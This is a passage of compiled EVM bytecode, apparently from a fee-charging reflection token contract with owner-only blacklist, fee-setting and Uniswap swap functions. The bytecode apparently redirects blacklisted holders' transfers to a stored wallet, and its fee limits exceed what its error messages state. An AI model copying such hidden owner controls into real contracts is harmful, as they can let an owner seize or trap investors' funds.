00191505060405180910390fd5b600760008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff166114fc576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f4163636f756e7420697320616c7265616479206578636c75646564000000000081525060200191505060405180910390fd5b60005b6008805490508110156116fb578173ffffffffffffffffffffffffffffffffffffffff166008828154811061153057fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156116ee5760086001600880549050038154811061158c57fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600882815481106115c457fe5b9060005260206000200160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555060088054806116b457fe5b6001900381819060005260206000200160006101000a81549073ffffffffffffffffffffffffffffffffffffffff021916905590556116fb565b80806001019150506114ff565b5050565b60006117a861170c613339565b846117a3856005600061171d613339565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613cb990919063ffffffff16565b613341565b6001905092915050565b60006117bc613339565b9050600760008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611861576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602c815260200180615a22602c913960400191505060405180910390fd5b600061186c83613d41565b505050505090506118c581600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613dbc90919063ffffffff16565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061191d81600c54613dbc90919063ffffffff16565b600c8190555061193883600d54613cb990919063ffffffff16565b600d81905550505050565b61194b613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611a0b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415611aa4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260248152602001806159556024913960400191505060405180910390fd5b600960008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611b64576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601e8152602001807f4163636f756e7420697320616c726561647920626c61636b6c6973746564000081525060200191505060405180910390fd5b6001600960008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600a819080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600b54831115611c9c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601f8152602001807f416d6f756e74206d757374206265206c657373207468616e20737570706c790081525060200191505060405180910390fd5b81611cbc576000611cac84613d41565b5050505050905080915050611cd3565b6000611cc784613d41565b50505050915050809150505b92915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b601760159054906101000a900460ff1681565b611d18613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611dd8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b6000611de330612350565b9050611dee81613e06565b50565b611df9613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611eb9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415611f52576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526022815260200180615a006022913960400191505060405180910390fd5b600760008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615612012576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f4163636f756e7420697320616c7265616479206578636c75646564000000000081525060200191505060405180910390fd5b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205411156120e6576120a2600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546111eb565b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b6001600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506008819080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b612202613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146122c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600181101580156122d4575060318111155b612346576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601a8152602001807f7461784665652073686f756c6420626520696e2031202d20343900000000000081525060200191505060405180910390fd5b8060118190555050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156123eb57600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050612436565b612433600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546111eb565b90505b919050565b612443613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612503576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b6125c9613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612689576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600960008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16612748576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601a8152602001807f4163636f756e74206973206e6f7420626c61636b6c697374656400000000000081525060200191505060405180910390fd5b60005b600a80549050811015612902578173ffffffffffffffffffffffffffffffffffffffff16600a828154811061277c57fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156128f557600a6001600a8054905003815481106127d857fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600a828154811061281057fe5b9060005260206000200160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600a8054806128bb57fe5b6001900381819060005260206000200160006101000a81549073ffffffffffffffffffffffffffffffffffffffff02191690559055612902565b808060010191505061274b565b5050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600f8054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015612a1d5780601f106129f257610100808354040283529160200191612a1d565b820191906000526020600020905b815481529060010190602001808311612a0057829003601f168201915b5050505050905090565b6000612aea612a34613339565b84612ae585604051806060016040528060258152602001615a4e6025913960056000612a5e613339565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b849092919063ffffffff16565b613341565b6001905092915050565b612afc613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612bbc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b60018110158015612bce575060318111155b612c40576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f6d61726b6574696e674665652073686f756c6420626520696e2031202d20313181525060200191505060405180910390fd5b8060128190555050565b6000612c5e612c57613339565b8484613538565b6001905092915050565b612c70613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612d30576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b612d93613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612e53576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b60018110158015612e65575060318111155b612ed7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f6c69717569646974794665652073686f756c6420626520696e2031202d20313181525060200191505060405180910390fd5b8060138190555050565b612ee9613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612fa9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80601760156101000a81548160ff02191690831515021790555050565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b613055613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614613115576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561319b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260268152602001806158186026913960400191505060405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b613260613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614613320576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600047905061332e816140b4565b50565b600047905090565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156133c7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602481526020018061599e6024913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561344d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602281526020018061583e6022913960400191505060405180910390fd5b80600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040518082815260200191505060405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156135be576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260258152602001806159796025913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415613644576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806157cb6023913960400191505060405180910390fd5b6000811161369d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602981526020018061592c6029913960400191505060405180910390fd5b600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156138965760006136fa30612350565b9050601854811061370b5760185490505b60006019548210159050601760149054906101000a900460ff1615801561373e5750601760159054906101000a900460ff165b80156137475750805b801561379f57507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b156137b35760195491506137b282614120565b5b600060019050600660008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061385a5750600660008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561386457600090505b61389286601a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1686846142b9565b5050505b61389e61295c565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415801561392557507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b156139fb57601854811115613985576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602881526020018061588f6028913960400191505060405180910390fd5b6018546139a38261399585612350565b613cb990919063ffffffff16565b11156139fa576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602f815260200180615860602f913960400191505060405180910390fd5b5b6000613a0630612350565b90506018548110613a175760185490505b60006019548210159050601760149054906101000a900460ff16158015613a4a5750601760159054906101000a900460ff165b8015613a535750805b8015613aab57507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b15613abf576019549150613abe82614120565b5b600060019050600660008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680613b665750600660008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15613b7057600090505b613b7c868686846142b9565b505050505050565b6000838311158290613c31576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b83811015613bf6578082015181840152602081019050613bdb565b50505050905090810190601f168015613c235780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b5060008385039050809150509392505050565b6000806000613c516145ca565b91509150613c688183613c6f90919063ffffffff16565b9250505090565b6000613cb183836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f00000000000081525061485b565b905092915050565b600080828401905083811015613d37576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f536166654d6174683a206164646974696f6e206f766572666c6f77000000000081525060200191505060405180910390fd5b8091505092915050565b6000806000806000806000806000613d728a601154613d6d601354601254613cb990919063ffffffff16565b614921565b9250925092506000613d82613c44565b90506000806000613d948e87866149b7565b9250925092508282828989899c509c509c509c509c509c505050505050505091939550919395565b6000613dfe83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250613b84565b905092915050565b6060600267ffffffffffffffff81118015613e2057600080fd5b50604051908082528060200260200182016040528015613e4f5781602001602082028036833780820191505090505b5090503081600081518110613e6057fe5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b158015613f0057600080fd5b505afa158015613f14573d6000803e3d6000fd5b505050506040513d6020811015613f2a57600080fd5b810190808051906020019092919050505081600181518110613f4857fe5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050613fad307f000000000000000000000000000000000000000000000000000000000000000084613341565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b815260040180868152602001858152602001806020018473ffffffffffffffffffffffffffffffffffffffff168152602001838152602001828103825285818151815260200191508051906020019060200280838360005b8381101561406f578082015181840152602081019050614054565b505050509050019650505050505050600060405180830381600087803b15801561409857600080fd5b505af11580156140ac573d6000803e3d6000fd5b505050505050565b601a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc829081150290604051600060405180830381858888f1935050505015801561411c573d6000803e3d6000fd5b5050565b6001601760146101000a81548160ff021916908315150217905550600061417a614157601354601254613cb990919063ffffffff16565b61416c60125485614a1590919063ffffffff16565b613c6f90919063ffffffff16565b905060006141918284613dbc90919063ffffffff16565b905060006141a9600283613c6f90919063ffffffff16565b905060006141c08284613dbc90919063ffffffff16565b9050600047905060006141dc8685613cb990919063ffffffff16565b90506141e781613e06565b60006141fc8347613dbc90919063ffffffff16565b90506000614225836142178885614a1590919063ffffffff16565b613c6f90919063ffffffff16565b90506142318582614a9b565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb56186828760405180848152602001838152602001828152602001935050505060405180910390a161429361428e8284613dbc90919063ffffffff16565b6140b4565b50505050505050506000601760146101000a81548160ff02191690831515021790555050565b806142c7576142c6614bec565b5b600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561436a5750600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561437f5761437a848484614c4e565b6145b6565b600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156144225750600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561443757614432848484614eae565b6145b5565b600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156144db5750600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156144f0576144eb84848461510e565b6145b4565b600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156145925750600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156145a7576145a28484846152d9565b6145b3565b6145b284848461510e565b5b5b5b5b806145c4576145c36155ce565b5b50505050565b6000806000600c5490506000600b54905060005b60088054905081101561481e578260036000600884815481106145fd57fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205411806146e4575081600460006008848154811061467c57fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054115b156146fb57600c54600b5494509450505050614857565b614784600360006008848154811061470f57fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205484613dbc90919063ffffffff16565b925061480f600460006008848154811061479a57fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205483613dbc90919063ffffffff16565b915080806001019150506145de565b50614836600b54600c54613c6f90919063ffffffff16565b82101561484e57600c54600b54935093505050614857565b81819350935050505b9091565b60008083118290614907576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b838110156148cc5780820151818401526020810190506148b1565b50505050905090810190601f1680156148f95780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b50600083858161491357fe5b049050809150509392505050565b60008060008061494d606461493f888a614a1590919063ffffffff16565b613c6f90919063ffffffff16565b905060006149776064614969888b614a1590919063ffffffff16565b613c6f90919063ffffffff16565b905060006149a087614992858c613dbc90919063ffffffff16565b613dbc90919063ffffffff16565b905080838395509550955050505093509350939050565b6000806000806149d08588614a1590919063ffffffff16565b905060006149e78688614a1590919063ffffffff16565b905060006149fe8284613dbc90919063ffffffff16565b905082818395509550955050505093509350939050565b600080831415614a285760009050614a95565b6000828402905082848281614a3957fe5b0414614a90576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260218152602001806158e36021913960400191505060405180910390fd5b809150505b92915050565b614ac6307f000000000000000000000000000000000000000000000000000000000000000084613341565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080614b1061295c565b426040518863ffffffff1660e01b8152600401808773ffffffffffffffffffffffffffffffffffffffff1681526020018681526020018581526020018481526020018373ffffffffffffffffffffffffffffffffffffffff16815260200182815260200196505050505050506060604051808303818588803b158015614b9557600080fd5b505af1158015614ba9573d6000803e3d6000fd5b50505050506040513d6060811015614bc057600080fd5b810190808051906020019092919080519060200190929190805190602001909291905050505050505050565b6000601154148015614c0057506000601254145b8015614c0e57506000601354145b15614c1857614c4c565b6011546014819055506012546015819055506013546016819055506000601181905550600060128190555060006013819055505b565b600080600080600080614c6087613d41565b955095509550955095509550614cbe87600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613dbc90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614d5386600360008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613dbc90919063ffffffff16565b600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614de885600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613cb990919063ffffffff16565b600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614e34816155eb565b614e3e8483615790565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b600080600080600080614ec087613d41565b955095509550955095509550614f1e86600360008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613dbc90919063ffffffff16565b600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614fb383600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613cb990919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061504885600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613cb990919063ffffffff16565b600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550615094816155eb565b61509e8483615790565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b60008060008060008061512087613d41565b95509550955095509550955061517e86600360008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613dbc90919063ffffffff16565b600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061521385600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613cb990919063ffffffff16565b600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061525f816155eb565b6152698483615790565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b6000806000806000806152eb87613d41565b95509550955095509550955061534987600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613dbc90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506153de86600360008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613dbc90919063ffffffff16565b600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061547383600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613cb990919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061550885600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613cb990919063ffffffff16565b600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550615554816155eb565b61555e8483615790565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b601454601181905550601554601281905550601654601381905550565b60006155f5613c44565b9050600061560c8284614a1590919063ffffffff16565b905061566081600360003073ffffffffffffffffffffffffffffffffffffffff1673fffffffffffffffff